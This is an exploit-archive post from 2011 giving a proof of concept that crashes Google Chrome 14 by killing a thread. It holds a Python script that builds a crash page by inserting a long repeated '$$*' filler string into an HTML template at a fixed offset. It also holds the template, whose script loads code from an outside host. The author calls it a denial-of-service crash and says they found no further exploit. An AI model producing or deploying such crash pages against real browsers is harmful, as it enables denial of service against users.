Google Chrome PoC, killing thread
Source: back-track.de  Author: pigtail23  Published: 2011-10-25

## _  (`-')  _   pigtail23   (`-')     (`-')  _   _           www.remoteshell.de ##
## \-.(OO ) (_)        .->   ( OO).->  (OO ).-/  (_)      <-.                    ##
## _.'    \ ,-(`-') ,---(`-')/    '._  / ,---.   ,-(`-'),--. )   .----.  .----.  ##
##(_...--'' | ( OO)'  .-(OO )|'--...__)| \ /`.\  | ( OO)|  (`-')\_,-.  |\_.-,  | ##
##|  |_.' | |  |  )|  | .-, \`--.  .--''-'|_.' | |  |  )|  |OO )   .' .'  |_  <  ##
##|  .___.'(|  |_/ |  | '.(_/   |  |  (|  .-.  |(|  |_/(|  '__ | .'  /_ .-. \  | ##
##|  |      |  |'->|  '-'  |    |  |   |  | |  | |  |'->|     |'|      |\ `-'  / ##
##`--'      `--'    `-----'     `--'   `--' `--' `--'   `-----' `------' `---''  ##
###################################################################################
###################################################################################
October 22, 2011

Ohh nice! What u doing google? Thx 4 ur bug! 0__o

Google Chrome PoC, killing thread. Exploitable or only a DOS!? Found no way to exploit it. Good Luck!!!

Test system: WinXP SP3, Win7 (64 bit)
Google Chrome version: 14.0.835.202

Greetings to:
mr_insecure, myownremote, noptrix, Eph, lnxg33k, CyberMaN,...
TheXero, Dexter, #back-track.de and #intern0t @ irc.freenode.net

###################################################################################

poc.html:

too big!

###################################################################################

Python script for debugging:

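#!/usr/bin/python
# Builds poc.html by inserting a long filler string into template.html.

filename = 'poc.html'

# Read the template that the filler is spliced into.
with open('template.html', 'r') as f:
    content = f.read()

# Filler: the 3-character pattern '$$*' repeated 36800 times.
buff = '$$*' * 36800

# Character offset in template.html where the filler is inserted.
rc = 484
content2 = content[:rc] + buff + content[rc:]

# Write the resulting test page.
with open(filename, 'w') as f:
    f.write(content2)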

###################################################################################


template.html:

<html>
<body>
<script>(function(){var d=document;if(!("autofocus" in d.createElement("input"))){try{d.getElementById("yschsp").focus();}catch(e){}}data={"assist":{"url":"http:\/\/www.google.com","maxLength":38,"linkStem":"http:\/\/www.remoteshell.de","settingsUrl":"http:\/\/www.chrooome.xxx","strings":{"searchbox_title":"bam","settings_text":"bam","gossip_desc":"bam","scroll_up":"bam","scroll_down":"bam","aria_available_suggestions":"bam","aria_no_suggestion_available":"bam"}}};window.onload=function(){var h=d.getElementsByTagName("head")[0],o=d.createElement("script");o.src="http://www.0__o";h.appendChild(o);};}());</script>
</body>
</html>


 